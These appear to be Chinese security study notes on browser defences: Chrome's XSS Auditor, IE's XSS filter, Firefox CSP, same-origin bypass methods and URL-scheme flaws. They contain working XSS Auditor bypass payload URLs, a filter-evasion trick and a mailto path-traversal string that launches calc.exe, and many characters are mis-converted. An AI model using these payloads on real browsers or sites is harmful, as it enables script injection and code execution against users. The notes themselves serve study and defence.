應用安全-瀏覽器安全-攻防

應用安全-瀏覽器安全-Chrome瀏覽器

關閉安全模式
暫時關閉
Linux: google-chrome --disable-web-security
Mac: open -a Google\ Chrome --args --disable-web-security
windows: 進入到chrome安裝目錄, chrome.exe --disable-web-security

xssAuditor

過濾器能夠在腳本執行以前就能夠攔截，並且任何使用webkit均可以使用這些規則
當加載網頁時，xssAuditor會在渲染的以前評估用戶的輸入數據：
1.檢查用戶輸入是否包含惡意內容，若是存在進行攔截
2.xssAuditor檢測用戶是否會反射到渲染的頁面中(html實體/html熟悉/javascript/css/url)
3.評估輸入上下文是否合法，非法進行過濾

chrome是在此法解析階段進行的，xssAuditor會逐一掃描檢測token，
若是token中發現危險的屬性和URL進行比較，若是URL中也存在一樣的數據，xssAuditor則會認爲這是一個反射XSS。
demo:
解析器解析<iframe src="x" onerror="alert(1)"></iframe>
1.依次檢查標籤iframe是否包含惡意屬性，src/onerror
2.若是src不是以javascript:開頭，則安全，放行
3.onerror中含有腳本，檢查URL是否包含
4.若是出如今URL中，認爲存在安全問題，將過濾 <iframe src="x" onerror="void(0)"></iframe>
5.停止iframe標籤檢查

 

xssAuditor繞過

http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e Bypass Chrome 60及以前版本
http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http%3A%2F%2Fmhz.pw%2Fgame%2Fxss%2Falert.swf%3E "只要支持flash的chrome版本（到Chrome 56），都可使用。
context == support flash

<object allowscriptaccess=always> <param name=url value=http://mhz.pw/game/xss/alert.swf>"
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href%3D%23script%20attributeName%3Dhref%20to%3Ddata%3A%2Calert(document.domain)%20%2F%3E%3Cscript%20id%3Dscript%20src%3Dfoo%3E%3C%2Fscript%3E "到Chrome 55/56可用， 無任何條件，只要輸出在頁面中便可執行代碼。
context == null

?xss=<svg><set href=#script attributeName=href to=data:,alert(document.domain) /><script id=script src=foo></script>"

chrome://version/ "Google Chrome 74.0.3729.169 (正式版本) （64 位） (cohort: Stable)
修訂版本 78e4f8db3ce38f6c26cf56eed7ae9b331fc67ada-refs/branch-heads/3729@{#1013}
操做系統 Windows 7 Service Pack 1 Build 7601.24149
JavaScript V8 7.4.288.28
Flash 32.0.0.192 C:\Users\6128000055\AppData\Local\Google\Chrome\User Data\PepperFlash\32.0.0.192\pepflashplayer.dll
用戶代理 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
命令行 ""C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"" --flag-switches-begin --flag-switches-end
可執行文件路徑 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
我的資料路徑 C:\Users\6128000055\AppData\Local\Google\Chrome\User Data\Default
其餘變體 d01ab0d3-6d9b32d4
8927cedd-377be55a
b0271b40-7f918788
4ca682fe-ca7d8d80
2b6ab552-7a3a298f
f88a4127-ca7d8d80
4b8c3f4-377be55a
c7c4e160-ca7d8d80
3095aa95-3f4a17df
c27fec31-5611c5b2
7c1bc906-f55a7974
7038b844-377be55a"

插件安裝 https://blog.csdn.net/wanwuguicang/article/details/79736381

應用安全-瀏覽器安全-IE瀏覽器 

Version    Product
4.40.308    Internet Explorer 1.0 (Plus! for Windows 95)
4.40.520    Internet Explorer 2.0
4.70.1155    Internet Explorer 3.0
4.70.1158    Internet Explorer 3.0 (Windows 95 OSR2)
4.70.1215    Internet Explorer 3.01
4.70.1300    Internet Explorer 3.02 and 3.02a
4.71.544    Internet Explorer 4.0 Platform Preview 1.0 (PP1)
4.71.1008.3    Internet Explorer 4.0 Platform Preview 2.0 (PP2)
4.71.1712.6    Internet Explorer 4.0
4.72.2106.8    Internet Explorer 4.01
4.72.3110.8    Internet Explorer 4.01 Service Pack 1 (Windows 98)
4.72.3612.1713    Internet Explorer 4.01 Service Pack 2
5.00.0518.10    Internet Explorer 5 Developer Preview (Beta 1)
5.00.0910.1309    Internet Explorer 5 Beta (Beta 2)
5.00.2014.0216    Internet Explorer 5
5.00.2314.1003    Internet Explorer 5 (Office 2000)
5.00.2614.3500    Internet Explorer 5 (Windows 98 Second Edition)
5.00.2516.1900    Internet Explorer 5.01 (Windows 2000 Beta 3, build 5.00.2031)
5.00.2919.800    Internet Explorer 5.01 (Windows 2000 RC1, build 5.00.2072)
5.00.2919.3800    Internet Explorer 5.01 (Windows 2000 RC2, build 5.00.2128)
5.00.2919.6307    Internet Explorer 5.01 (Office 2000 SR-1)
5.00.2920.0000    Internet Explorer 5.01 (Windows 2000, build 5.00.2195)
5.00.3103.1000    Internet Explorer 5.01 SP1 (Windows 2000 SP1)
5.00.3105.0106    Internet Explorer 5.01 SP1 (Windows 95/98 and Windows NT 4.0)
5.00.3314.2101    Internet Explorer 5.01 SP2 (Windows 95/98 and Windows NT 4.0)
5.00.3315.1000    Internet Explorer 5.01 SP2 (Windows 2000 SP2)
5.00.3502.1000    Internet Explorer 5.01 SP3 (Windows 2000 SP3 only)
5.00.3700.1000    Internet Explorer 5.01 SP4 (Windows 2000 SP4 only)
5.50.3825.1300    Internet Explorer 5.5 Developer Preview (Beta)
5.50.4030.2400    Internet Explorer 5.5 & Internet Tools Beta
5.50.4134.0100    Internet Explorer 5.5 for Windows Me (4.90.3000)
5.50.4134.0600    Internet Explorer 5.5
5.50.4308.2900    Internet Explorer 5.5 Advanced Security Privacy Beta
5.50.4522.1800    Internet Explorer 5.5 Service Pack 1
5.50.4807.2300    Internet Explorer 5.5 Service Pack 2
6.00.2462.0000    Internet Explorer 6 Public Preview (Beta)
6.00.2479.0006    Internet Explorer 6 Public Preview (Beta) Refresh
6.00.2600.0000    Internet Explorer 6 (Windows XP)
6.00.2800.1106    Internet Explorer 6 Service Pack 1 (Windows XP SP1)
6.00.2900.2180    Internet Explorer 6 for Windows XP SP2
6.00.2900.5512    Internet Explorer 6 for Windows XP SP3
6.00.3663.0000    Internet Explorer 6 for Windows Server 2003 RC1
6.00.3718.0000    Internet Explorer 6 for Windows Server 2003 RC2
6.00.3790.0000    Internet Explorer 6 for Windows Server 2003 (release)
6.00.3790.1830    Internet Explorer 6 for Windows Server 2003 SP1 and Windows XP x64
6.00.3790.3959    Internet Explorer 6 SP2 for Windows Server 2003 SP1 and Windows XP x64
7.00.5730.1100    Internet Explorer 7 for Windows XP and Windows Server 2003
7.00.5730.1300    Internet Explorer 7 for Windows XP and Windows Server 2003
7.00.6000.16386    Internet Explorer 7 for Windows Vista
7.00.6000.16441    Internet Explorer 7 for Windows Server 2003 SP2 x64
7.00.6000.16441    Internet Explorer 7 for Windows XP SP2 x64
7.00.6001.1800    Internet Explorer 7 for Windows Server 2008 and for Windows Vista SP1
8.00.6001.17184    Internet Explorer 8 Beta 1
8.00.6001.18241    Internet Explorer 8 Beta 2
8.00.6001.18372    Internet Explorer 8 RC1
8.00.6001.18702    Internet Explorer 8 for Windows XP, Windows Vista, Windows Server 2003 and Windows Server 2008
8.00.7000.00000    Internet Explorer 8 for Windows 7 Beta
8.00.7600.16385    Internet Explorer 8 for Windows 7 and for Windows Server 2008 R2 (release)
9.0.7930.16406     Internet Explorer 9 Beta

 

IE xssFilter                        
IE的xssFilter是在IE8 beta2開始的，IE的xss檢測比較粗暴，IE的xssFilter基於正則進行檢測的，具體的規則位於
C:\Windows\System32下的mshtml.dll文件中
在cmd中進行查看：
findstr /C:"sc{r}" C:\WINDOWS\SYSTEM32\mshtml.dll|find "{"
                    
字符轉義                        
單引號    \'                    
右斜槓    右雙斜槓    

應用安全-瀏覽器安全-FIreFox瀏覽器

CSP策略（Content Security Policy）                        
"Firefox中有Content Security Policy。其作法就是有服務器返回一個HTTP頭，並在其中描述頁面應該遵照的安全策略。使用CSP的用法以下，插入一個HTTP返回頭：

X-Content-Security-Policy:policy
其中policy的描述比較靈活，例如：

X-Content-Security-Policy:allow 'self'*.com
瀏覽器將信任來自mydomain.com及其子域下的內容。

再好比：

X-Content-Security-Policy:allow 'self';img-src*;media-src medial.com; script-src userscripts.example.com
除了信任自身來源以外，還能夠加在任意域的圖片，來自medial.com的媒體文件，以及userscripts.example.com的腳本，其餘的規律一概拒絕。

CSP的設計理念是出色的，就是配置規則在頁面較多的時候有點複雜。"                        
防護攻擊對象    "UXSS

SOP

Code Injection

Use Inline Styles Violation"                    
檢測網址    "http://csptesting.herokuapp.com/
項目源碼：https://github.com/eoftedal/csp-testing                 

 

同源策略

帶有src屬性的標籤（例如<script>、<img>、<iframe>）不受限制
檢測方法    
console 輸入：
var x = XMLHttpRequest();
x.open('GET', 'https://www.baidu.com',true);
x.send();
document.write(x.responseText）;

同源策略 - 繞過 - JSONP

同源策略 - 繞過 - CORS

Access-Control-Allow-Origin 
IE瀏覽器不能低於IE10    

分類
簡單請求：瀏覽器直接發出CORS請求。具體來講，就是在頭信息之中，增長一個Origin字段。
非簡單請求：是對服務器有特殊要求的請求，好比請求方法是PUT或DELETE，或者Content-Type字段的類型是application/json

同源策略 - 繞過 - 降域

同源策略 - 繞過 - PostMessage

同源策略 - 繞過 - 代理繞過

瀏覽器沙箱

多進程架構

瀏覽器沙箱 - 多進程架構 - 繞過

第三方插件            

惡意網址

攻擊 
「掛馬」網站    #網站中包含惡意腳本，經過利用瀏覽器的漏洞(包括插件控件漏洞)，執行shellcode，在用戶電腦中植馬
釣魚網站        #經過模仿網站類似頁面

防護    
針對惡意網址攔截，推送惡意網址黑名單爲主，安全產商或機構提供惡意網址黑名單

UXSS

https://github.com/Metnew/uxss-db

瀏覽器安全 - XSS防護

X-XSS-Protection    針對IE、Chrome 、Safari 
IE - XSS Filter，Chrome -XSS Auditor                    
啓動    在服務器的響應報文里加上這個字段                
語法    "X-XSS-Protection : 0
X-XSS-Protection : 1
X-XSS-Protection : 1; mode=block
X-XSS-Protection : 1; report=<reporting-uri>
X-XSS-Protection:1;mode=block;report=<reporting-uri>"                    

瀏覽器安全 - XSS - X-XSS-Protection - 繞過

script - 》sscriptcript

url scheme（支持Windows, MAC, Linux，iOS, Android）

mailto://test@test.com    
 thunder://xxxxx    
 http://
 https://    
 ftp://
 file://
 help://    
 file系列    
1.wshfile
2.wsffile
3.vbsfile
4.vbefile
5.jsefile

url scheme - Windows7

url scheme 被記錄在註冊表 HKEY_CLASSES_ROOT 
如要建立一個新的 url scheme，直接在 HKEY_CLASSES_ROOT 添加便可，並在相應的字段中填入對應的值。建立的子項名即爲 url scheme 功能名，在該子項下還包含兩個項：DefaultIcon 和 shell，DefaultIcon 包含該功能所使用的默認圖標路徑；在 shell 項下繼續建立子項，例如: open，而後在 open 項下建立 command 子項，用於描述應用程序的路徑以及參數

url scheme自定義 - Windows

方式一：直接添加註冊表的方式(Pluggable Protocol)
建立 calc 用於啓動 C:\Windows\System32\calc.exe：
HKEY_CLASSES_ROOT
    calc
    (Default) = "URL:Calc Protocol"
    URL Protocol = ""
    DefaultIcon
    (Default) = "C:\Windows\System32\calc.exe,1"
    shell
        open
            command
                (Default) = "C:\Windows\System32\calc.exe" "%1"


方式二：異步可插拔協議(Asynchronous Pluggable Protocol)，註冊的協議會記錄在 HKEY_CLASSES_ROOT\PROTOCOLS\ 下

查看系統支持的url scheme

Windows: [https://images.seebug.org/archive/duh4win.vbs]
MAC: [https://images.seebug.org/archive/duh4mac.m]
Linux: [https://images.seebug.org/archive/duh4linux.sh]

url scheme漏洞整理

url scheme RCE，其出如今 Windows XP 下已安裝 IE7 版本的系統中，影響範圍包括全部支持 url scheme 的應用程序。
mailto:test%../../../../windows/system32/calc.exe".cmd

CVE-2018-1000006
CVE-2018-8495

url scheme防護

保證操做系統、瀏覽器(或其餘支持 url 的應用)以及應用程序三方的安全性